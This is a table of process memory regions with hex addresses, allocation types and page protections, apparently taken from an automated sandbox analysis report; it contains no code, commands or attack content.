||
|
29D4000
|
heap
|
page read and write
|
||
|
25DDC000
|
unclassified section
|
page execute and read and write
|
||
|
5509000
|
trusted library allocation
|
page read and write
|
||
|
2F5E000
|
stack
|
page read and write
|
||
|
83D0000
|
direct allocation
|
page read and write
|
||
|
4580000
|
heap
|
page read and write
|
||
|
BD01DCA000
|
stack
|
page read and write
|
||
|
BD00DFE000
|
stack
|
page read and write
|
||
|
3038000
|
heap
|
page read and write
|
||
|
71CD000
|
stack
|
page read and write
|
||
|
637000
|
stack
|
page read and write
|
||
|
430E000
|
stack
|
page read and write
|
||
|
2521C000
|
stack
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
6A60000
|
direct allocation
|
page read and write
|
||
|
25D73000
|
unclassified section
|
page execute and read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
299B87A0000
|
heap
|
page read and write
|
||
|
24860000
|
direct allocation
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
29A0000
|
heap
|
page readonly
|
||
|
255E8000
|
heap
|
page read and write
|
||
|
299A0621000
|
trusted library allocation
|
page read and write
|
||
|
29D5000
|
heap
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
299B881D000
|
heap
|
page read and write
|
||
|
47F1000
|
heap
|
page read and write
|
||
|
2562D000
|
heap
|
page read and write
|
||
|
2535F000
|
stack
|
page read and write
|
||
|
285B000
|
stack
|
page read and write
|
||
|
356E000
|
stack
|
page read and write
|
||
|
A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
|
250EE000
|
stack
|
page read and write
|
||
|
2999E777000
|
heap
|
page read and write
|
||
|
2999E78D000
|
heap
|
page read and write
|
||
|
960C000
|
heap
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
32A0000
|
heap
|
page read and write
|
||
|
95FB000
|
heap
|
page read and write
|
||
|
7DF404350000
|
trusted library allocation
|
page execute and read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
811B000
|
heap
|
page read and write
|
||
|
4581000
|
heap
|
page read and write
|
||
|
2516E000
|
stack
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
BD01CCE000
|
stack
|
page read and write
|
||
|
95BC000
|
heap
|
page read and write
|
||
|
9F0000
|
trusted library section
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
434E000
|
stack
|
page read and write
|
||
|
811F000
|
heap
|
page read and write
|
||
|
24FC0000
|
direct allocation
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
257DC000
|
heap
|
page read and write
|
||
|
4598000
|
heap
|
page read and write
|
||
|
76C1000
|
remote allocation
|
page execute and read and write
|
||
|
6AAE000
|
stack
|
page read and write
|
||
|
BD00F77000
|
stack
|
page read and write
|
||
|
299A084D000
|
trusted library allocation
|
page read and write
|
||
|
25D00000
|
unclassified section
|
page execute and read and write
|
||
|
3EC000
|
stack
|
page read and write
|
||
|
2856000
|
stack
|
page read and write
|
||
|
24840000
|
direct allocation
|
page read and write
|
||
|
9690000
|
direct allocation
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
DB40000
|
direct allocation
|
page execute and read and write
|
||
|
2525C000
|
stack
|
page read and write
|
||
|
4607000
|
heap
|
page read and write
|
||
|
2F9F000
|
stack
|
page read and write
|
||
|
299B8B5E000
|
heap
|
page read and write
|
||
|
7F6C000
|
stack
|
page read and write
|
||
|
299B0641000
|
trusted library allocation
|
page read and write
|
||
|
95A6000
|
heap
|
page read and write
|
||
|
4581000
|
heap
|
page read and write
|
||
|
95BB000
|
heap
|
page read and write
|
||
|
4585000
|
heap
|
page read and write
|
||
|
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
|
44F9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B76B000
|
trusted library allocation
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
35C0000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
6E92000
|
heap
|
page read and write
|
||
|
68DE000
|
stack
|
page read and write
|
||
|
69EB000
|
stack
|
page read and write
|
||
|
BD012FC000
|
stack
|
page read and write
|
||
|
69AD000
|
stack
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
24EAE000
|
stack
|
page read and write
|
||
|
BD00BFE000
|
stack
|
page read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
7240000
|
trusted library allocation
|
page read and write
|
||
|
69F0000
|
direct allocation
|
page read and write
|
||
|
24C3E000
|
stack
|
page read and write
|
||
|
7FB0000
|
heap
|
page read and write
|
||
|
9640000
|
heap
|
page readonly
|
||
|
837D000
|
stack
|
page read and write
|
||
|
4593000
|
heap
|
page read and write
|
||
|
247C0000
|
direct allocation
|
page read and write
|
||
|
459C000
|
heap
|
page read and write
|
||
|
257DC000
|
heap
|
page read and write
|
||
|
8100000
|
heap
|
page read and write
|
||
|
299A0C93000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
250AD000
|
stack
|
page read and write
|
||
|
24850000
|
direct allocation
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
95BF000
|
heap
|
page read and write
|
||
|
9BF000
|
stack
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
254AB000
|
unclassified section
|
page execute and read and write
|
||
|
251AF000
|
stack
|
page read and write
|
||
|
95FD000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
299A0250000
|
trusted library allocation
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
4D72000
|
trusted library allocation
|
page read and write
|
||
|
96A0000
|
direct allocation
|
page read and write
|
||
|
4581000
|
heap
|
page read and write
|
||
|
83C0000
|
direct allocation
|
page read and write
|
||
|
4358000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
|
25933000
|
heap
|
page read and write
|
||
|
2D4A000
|
heap
|
page read and write
|
||
|
2D4A000
|
heap
|
page read and write
|
||
|
7FAC000
|
stack
|
page read and write
|
||
|
2999E930000
|
heap
|
page read and write
|
||
|
299B8791000
|
heap
|
page read and write
|
||
|
2999E8A0000
|
heap
|
page read and write
|
||
|
299A23BB000
|
trusted library allocation
|
page read and write
|
||
|
7F20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
283C000
|
stack
|
page read and write
|
||
|
25130000
|
remote allocation
|
page read and write
|
||
|
4490000
|
heap
|
page read and write
|
||
|
299B8960000
|
heap
|
page read and write
|
||
|
25D5D000
|
unclassified section
|
page execute and read and write
|
||
|
333B000
|
heap
|
page read and write
|
||
|
6A20000
|
direct allocation
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
45D7000
|
heap
|
page read and write
|
||
|
BD00A7E000
|
stack
|
page read and write
|
||
|
252DF000
|
stack
|
page read and write
|
||
|
A80000
|
heap
|
page readonly
|
||
|
299B8B3C000
|
heap
|
page read and write
|
||
|
714F000
|
stack
|
page read and write
|
||
|
AAA000
|
heap
|
page read and write
|
||
|
BD40000
|
direct allocation
|
page execute and read and write
|
||
|
2A6F000
|
heap
|
page read and write
|
||
|
4B88000
|
heap
|
page read and write
|
||
|
254D6000
|
direct allocation
|
page execute and read and write
|
||
|
299A24CB000
|
trusted library allocation
|
page read and write
|
||
|
BD00EF9000
|
stack
|
page read and write
|
||
|
2531C000
|
stack
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
4580000
|
heap
|
page read and write
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
25871000
|
heap
|
page read and write
|
||
|
45A3000
|
heap
|
page read and write
|
||
|
95FD000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
6F98000
|
trusted library allocation
|
page read and write
|
||
|
95BF000
|
heap
|
page read and write
|
||
|
CB5000
|
heap
|
page execute and read and write
|
||
|
4613000
|
heap
|
page read and write
|
||
|
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
|
9890000
|
direct allocation
|
page read and write
|
||
|
B7A7000
|
trusted library allocation
|
page read and write
|
||
|
CB0000
|
heap
|
page execute and read and write
|
||
|
4560000
|
heap
|
page read and write
|
||
|
6F90000
|
trusted library allocation
|
page read and write
|
||
|
45F5000
|
heap
|
page read and write
|
||
|
2A3E000
|
unkown
|
page read and write
|
||
|
4594000
|
heap
|
page read and write
|
||
|
4613000
|
heap
|
page read and write
|
||
|
299A0180000
|
heap
|
page read and write
|
||
|
43F0000
|
trusted library allocation
|
page read and write
|
||
|
9650000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
2B50000
|
heap
|
page read and write
|
||
|
BD01D4D000
|
stack
|
page read and write
|
||
|
95F7000
|
heap
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B937000
|
trusted library allocation
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
7FAF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
72A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
744000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
A00000
|
trusted library allocation
|
page read and write
|
||
|
2B9D000
|
stack
|
page read and write
|
||
|
960C000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
6A00000
|
direct allocation
|
page read and write
|
||
|
448E000
|
stack
|
page read and write
|
||
|
800E000
|
stack
|
page read and write
|
||
|
80E0000
|
trusted library allocation
|
page read and write
|
||
|
24EEF000
|
stack
|
page read and write
|
||
|
247E0000
|
direct allocation
|
page read and write
|
||
|
94C1000
|
remote allocation
|
page execute and read and write
|
||
|
54A1000
|
trusted library allocation
|
page read and write
|
||
|
960C000
|
heap
|
page read and write
|
||
|
8380000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
2541E000
|
stack
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
45D7000
|
heap
|
page read and write
|
||
|
299A0FAE000
|
trusted library allocation
|
page read and write
|
||
|
6B00000
|
heap
|
page read and write
|
||
|
2999E935000
|
heap
|
page read and write
|
||
|
4600000
|
heap
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
4581000
|
heap
|
page read and write
|
||
|
4593000
|
heap
|
page read and write
|
||
|
9601000
|
heap
|
page read and write
|
||
|
718E000
|
stack
|
page read and write
|
||
|
2545F000
|
stack
|
page read and write
|
||
|
28C3000
|
heap
|
page read and write
|
||
|
4590000
|
heap
|
page read and write
|
||
|
247F0000
|
direct allocation
|
page read and write
|
||
|
4594000
|
heap
|
page read and write
|
||
|
25AC000
|
stack
|
page read and write
|
||
|
4440000
|
heap
|
page read and write
|
||
|
25D80000
|
unclassified section
|
page execute and read and write
|
||
|
4EC1000
|
remote allocation
|
page execute and read and write
|
||
|
9540000
|
direct allocation
|
page execute and read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
2999E74E000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
299A23DC000
|
trusted library allocation
|
page read and write
|
||
|
6FF3000
|
heap
|
page read and write
|
||
|
4595000
|
heap
|
page read and write
|
||
|
2872000
|
stack
|
page read and write
|
||
|
70AC000
|
heap
|
page read and write
|
||
|
2B0A000
|
heap
|
page read and write
|
||
|
43EE000
|
stack
|
page read and write
|
||
|
2999E6C0000
|
heap
|
page read and write
|
||
|
45A3000
|
heap
|
page read and write
|
||
|
80C1000
|
remote allocation
|
page execute and read and write
|
||
|
6FC0000
|
heap
|
page read and write
|
||
|
25763000
|
heap
|
page read and write
|
||
|
2564D000
|
heap
|
page read and write
|
||
|
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
|
860000
|
heap
|
page read and write
|
||
|
960C000
|
heap
|
page read and write
|
||
|
A60000
|
trusted library allocation
|
page read and write
|
||
|
25130000
|
remote allocation
|
page read and write
|
||
|
9520000
|
heap
|
page read and write
|
||
|
24E6E000
|
stack
|
page read and write
|
||
|
299A0AC1000
|
trusted library allocation
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
25901000
|
heap
|
page read and write
|
||
|
4597000
|
heap
|
page read and write
|
||
|
4590000
|
heap
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
54C9000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
29D5000
|
heap
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
25671000
|
heap
|
page read and write
|
||
|
299B8AA0000
|
heap
|
page read and write
|
||
|
45AB000
|
heap
|
page read and write
|
||
|
24820000
|
direct allocation
|
page read and write
|
||
|
960C000
|
heap
|
page read and write
|
||
|
29D5000
|
heap
|
page read and write
|
||
|
6CC1000
|
remote allocation
|
page execute and read and write
|
||
|
299A0290000
|
heap
|
page execute and read and write
|
||
|
9591000
|
heap
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
80D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4593000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
2B5D000
|
stack
|
page read and write
|
||
|
45AE000
|
heap
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
25671000
|
heap
|
page read and write
|
||
|
255F1000
|
heap
|
page read and write
|
||
|
4B81000
|
heap
|
page read and write
|
||
|
4581000
|
heap
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
47F0000
|
heap
|
page read and write
|
||
|
98F0000
|
heap
|
page read and write
|
||
|
299A0140000
|
trusted library allocation
|
page read and write
|
||
|
299A06AE000
|
trusted library allocation
|
page read and write
|
||
|
2999E7B4000
|
heap
|
page read and write
|
||
|
2B2B000
|
heap
|
page read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
6D9E000
|
stack
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
98B0000
|
direct allocation
|
page read and write
|
||
|
6AED000
|
stack
|
page read and write
|
||
|
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
24830000
|
direct allocation
|
page read and write
|
||
|
2529B000
|
stack
|
page read and write
|
||
|
352F000
|
unkown
|
page read and write
|
||
|
2562D000
|
heap
|
page read and write
|
||
|
95BF000
|
heap
|
page read and write
|
||
|
BD0117E000
|
stack
|
page read and write
|
||
|
681E000
|
stack
|
page read and write
|
||
|
BD00E7D000
|
stack
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
71C000
|
heap
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
4597000
|
heap
|
page read and write
|
||
|
299A11DA000
|
trusted library allocation
|
page read and write
|
||
|
45A8000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
BD00AFE000
|
stack
|
page read and write
|
||
|
28CD000
|
heap
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
6E2E000
|
stack
|
page read and write
|
||
|
28CD000
|
heap
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
8AC1000
|
remote allocation
|
page execute and read and write
|
||
|
95FD000
|
heap
|
page read and write
|
||
|
299A02D5000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
27B0000
|
heap
|
page read and write
|
||
|
43A8000
|
heap
|
page read and write
|
||
|
4580000
|
heap
|
page read and write
|
||
|
564D000
|
trusted library allocation
|
page read and write
|
||
|
458C000
|
heap
|
page read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
299A0ACD000
|
trusted library allocation
|
page read and write
|
||
|
4581000
|
heap
|
page read and write
|
||
|
2D4B000
|
heap
|
page read and write
|
||
|
2D49000
|
heap
|
page read and write
|
||
|
2580A000
|
heap
|
page read and write
|
||
|
29D5000
|
heap
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
62C1000
|
remote allocation
|
page execute and read and write
|
||
|
458D000
|
heap
|
page read and write
|
||
|
45C3000
|
heap
|
page read and write
|
||
|
BD00B7D000
|
stack
|
page read and write
|
||
|
24E2E000
|
stack
|
page read and write
|
||
|
7F15000
|
trusted library allocation
|
page read and write
|
||
|
299A02D7000
|
heap
|
page read and write
|
||
|
2563A000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
4A8B000
|
heap
|
page read and write
|
||
|
BD01078000
|
stack
|
page read and write
|
||
|
9790000
|
heap
|
page read and write
|
||
|
97A0000
|
heap
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
2999E76C000
|
heap
|
page read and write
|
||
|
2D49000
|
heap
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
455F000
|
stack
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
24F90000
|
direct allocation
|
page read and write
|
||
|
299A2057000
|
trusted library allocation
|
page read and write
|
||
|
BD0127F000
|
stack
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
98D0000
|
direct allocation
|
page read and write
|
||
|
9F40000
|
direct allocation
|
page execute and read and write
|
||
|
2874000
|
stack
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
80CD000
|
stack
|
page read and write
|
||
|
256E9000
|
heap
|
page read and write
|
||
|
95BB000
|
heap
|
page read and write
|
||
|
2D46000
|
heap
|
page read and write
|
||
|
44C1000
|
remote allocation
|
page execute and read and write
|
||
|
458F000
|
heap
|
page read and write
|
||
|
A70000
|
heap
|
page execute and read and write
|
||
|
2850000
|
heap
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
96B0000
|
heap
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
6A10000
|
direct allocation
|
page read and write
|
||
|
710E000
|
stack
|
page read and write
|
||
|
25940000
|
heap
|
page read and write
|
||
|
2D4A000
|
heap
|
page read and write
|
||
|
299A1BE6000
|
trusted library allocation
|
page read and write
|
||
|
299B8AEA000
|
heap
|
page read and write
|
||
|
299B8957000
|
heap
|
page execute and read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
308D000
|
stack
|
page read and write
|
||
|
4613000
|
heap
|
page read and write
|
||
|
25130000
|
remote allocation
|
page read and write
|
||
|
25930000
|
heap
|
page read and write
|
||
|
2999E7B9000
|
heap
|
page read and write
|
||
|
253DF000
|
stack
|
page read and write
|
||
|
254C0000
|
direct allocation
|
page read and write
|
||
|
25670000
|
heap
|
page read and write
|
||
|
707C000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
299A02D0000
|
heap
|
page read and write
|
||
|
45F8000
|
trusted library allocation
|
page read and write
|
||
|
299B091A000
|
trusted library allocation
|
page read and write
|
||
|
299A11B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
7083000
|
heap
|
page read and write
|
||
|
24810000
|
direct allocation
|
page read and write
|
||
|
689E000
|
stack
|
page read and write
|
||
|
952A000
|
heap
|
page read and write
|
||
|
960C000
|
heap
|
page read and write
|
||
|
255E9000
|
heap
|
page read and write
|
||
|
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
|
868000
|
heap
|
page read and write
|
||
|
C740000
|
direct allocation
|
page execute and read and write
|
||
|
83F0000
|
direct allocation
|
page read and write
|
||
|
D140000
|
direct allocation
|
page execute and read and write
|
||
|
299B8B40000
|
heap
|
page read and write
|
||
|
299B8ACB000
|
heap
|
page read and write
|
||
|
6FB0000
|
trusted library allocation
|
page read and write
|
||
|
95BF000
|
heap
|
page read and write
|
||
|
8430000
|
trusted library allocation
|
page execute and read and write
|
||
|
45F5000
|
heap
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
804C000
|
stack
|
page read and write
|
||
|
29D5000
|
heap
|
page read and write
|
||
|
299A11C5000
|
trusted library allocation
|
page read and write
|
||
|
4593000
|
heap
|
page read and write
|
||
|
7220000
|
trusted library allocation
|
page read and write
|
||
|
2D4A000
|
heap
|
page read and write
|
||
|
4580000
|
heap
|
page read and write
|
||
|
6C2E000
|
stack
|
page read and write
|
||
|
4B88000
|
heap
|
page read and write
|
||
|
25EA000
|
stack
|
page read and write
|
||
|
2999E660000
|
heap
|
page read and write
|
||
|
7C87000
|
stack
|
page read and write
|
||
|
290E000
|
unkown
|
page read and write
|
||
|
2A2E000
|
unkown
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
A42000
|
trusted library allocation
|
page read and write
|
||
|
4593000
|
heap
|
page read and write
|
||
|
98F6000
|
heap
|
page read and write
|
||
|
E540000
|
direct allocation
|
page execute and read and write
|
||
|
299B87A3000
|
heap
|
page read and write
|
||
|
25620000
|
heap
|
page read and write
|
||
|
4613000
|
heap
|
page read and write
|
||
|
4590000
|
heap
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
45BA000
|
heap
|
page read and write
|
||
|
A14000
|
trusted library allocation
|
page read and write
|
||
|
808E000
|
stack
|
page read and write
|
||
|
8117000
|
heap
|
page read and write
|
||
|
299A0AD1000
|
trusted library allocation
|
page read and write
|
||
|
BD007DF000
|
stack
|
page read and write
|
||
|
4A80000
|
heap
|
page read and write
|
||
|
331E000
|
unkown
|
page read and write
|
||
|
299B880D000
|
heap
|
page read and write
|
||
|
25570000
|
heap
|
page read and write
|
||
|
25490000
|
unclassified section
|
page execute and read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
72FC000
|
stack
|
page read and write
|
||
|
4B88000
|
heap
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
49A0000
|
trusted library allocation
|
page read and write
|
||
|
A13000
|
trusted library allocation
|
page execute and read and write
|
||
|
6FEC000
|
heap
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
255F1000
|
heap
|
page read and write
|
||
|
BD00796000
|
stack
|
page read and write
|
||
|
458C000
|
heap
|
page read and write
|
||
|
25941000
|
heap
|
page read and write
|
||
|
49AC000
|
heap
|
page read and write
|
||
|
25900000
|
heap
|
page read and write
|
||
|
A45000
|
trusted library allocation
|
page execute and read and write
|
||
|
3AC1000
|
remote allocation
|
page execute and read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
47F1000
|
heap
|
page read and write
|
||
|
4593000
|
heap
|
page read and write
|
||
|
A20000
|
trusted library allocation
|
page read and write
|
||
|
2860000
|
heap
|
page readonly
|
||
|
2583A000
|
heap
|
page read and write
|
||
|
217E000
|
stack
|
page read and write
|
||
|
24FB0000
|
direct allocation
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
4D78000
|
trusted library allocation
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
83E0000
|
direct allocation
|
page read and write
|
||
|
45A3000
|
heap
|
page read and write
|
||
|
2D7E000
|
stack
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
7C90000
|
trusted library allocation
|
page read and write
|
||
|
2504F000
|
stack
|
page read and write
|
||
|
6C6B000
|
stack
|
page read and write
|
||
|
4588000
|
heap
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
29D5000
|
heap
|
page read and write
|
||
|
299A23A4000
|
trusted library allocation
|
page read and write
|
||
|
24D10000
|
heap
|
page read and write
|
||
|
29D5000
|
heap
|
page read and write
|
||
|
BD00D7F000
|
stack
|
page read and write
|
||
|
84F000
|
stack
|
page read and write
|
||
|
95FB000
|
heap
|
page read and write
|
||
|
4594000
|
heap
|
page read and write
|
||
|
95FB000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
8A40000
|
direct allocation
|
page execute and read and write
|
||
|
463F000
|
stack
|
page read and write
|
||
|
4B80000
|
heap
|
page read and write
|
||
|
25901000
|
heap
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
98C0000
|
direct allocation
|
page read and write
|
||
|
A940000
|
direct allocation
|
page execute and read and write
|
||
|
299B8A8A000
|
heap
|
page read and write
|
||
|
8390000
|
trusted library allocation
|
page read and write
|
||
|
4B81000
|
heap
|
page read and write
|
||
|
BD010FE000
|
stack
|
page read and write
|
||
|
2AFF000
|
unkown
|
page read and write
|
||
|
25630000
|
heap
|
page read and write
|
||
|
6DDE000
|
stack
|
page read and write
|
||
|
A29000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
2500E000
|
stack
|
page read and write
|
||
|
810B000
|
heap
|
page read and write
|
||
|
4A81000
|
heap
|
page read and write
|
||
|
45A6000
|
heap
|
page read and write
|
||
|
95B4000
|
heap
|
page read and write
|
||
|
6A30000
|
direct allocation
|
page read and write
|
||
|
95A6000
|
heap
|
page read and write
|
||
|
24FA0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
95FD000
|
heap
|
page read and write
|
||
|
9553000
|
heap
|
page read and write
|
||
|
6FC9000
|
heap
|
page read and write
|
||
|
95FD000
|
heap
|
page read and write
|
||
|
4B89000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
2A8A000
|
heap
|
page read and write
|
||
|
458C000
|
heap
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
299A0120000
|
trusted library allocation
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
2999E775000
|
heap
|
page read and write
|
||
|
95FD000
|
heap
|
page read and write
|
||
|
4581000
|
heap
|
page read and write
|
||
|
833E000
|
stack
|
page read and write
|
||
|
7200000
|
trusted library allocation
|
page read and write
|
||
|
299A1F1B000
|
trusted library allocation
|
page read and write
|
||
|
299B8980000
|
heap
|
page read and write
|
||
|
6FD9000
|
heap
|
page read and write
|
||
|
2560E000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
4595000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
2D9C000
|
heap
|
page read and write
|
||
|
95B4000
|
heap
|
page read and write
|
||
|
8123000
|
heap
|
page read and write
|
||
|
4A2F000
|
stack
|
page read and write
|
||
|
25571000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
25DD6000
|
unclassified section
|
page execute and read and write
|
||
|
4581000
|
heap
|
page read and write
|
||
|
2745000
|
stack
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
4B80000
|
trusted library allocation
|
page read and write
|
||
|
98A0000
|
direct allocation
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
2A6E000
|
stack
|
page read and write
|
||
|
28C0000
|
heap
|
page read and write
|
||
|
45A6000
|
heap
|
page read and write
|
||
|
299B0621000
|
trusted library allocation
|
page read and write
|
||
|
25D59000
|
unclassified section
|
page execute and read and write
|
||
|
2A73000
|
heap
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
299A0AA2000
|
trusted library allocation
|
page read and write
|
||
|
4590000
|
heap
|
page read and write
|
||
|
2D4A000
|
heap
|
page read and write
|
||
|
6D1D000
|
stack
|
page read and write
|
||
|
BD011FE000
|
stack
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
36CF000
|
stack
|
page read and write
|
||
|
4581000
|
heap
|
page read and write
|
||
|
45A3000
|
heap
|
page read and write
|
||
|
4590000
|
heap
|
page read and write
|
||
|
6EE000
|
stack
|
page read and write
|
||
|
2583A000
|
heap
|
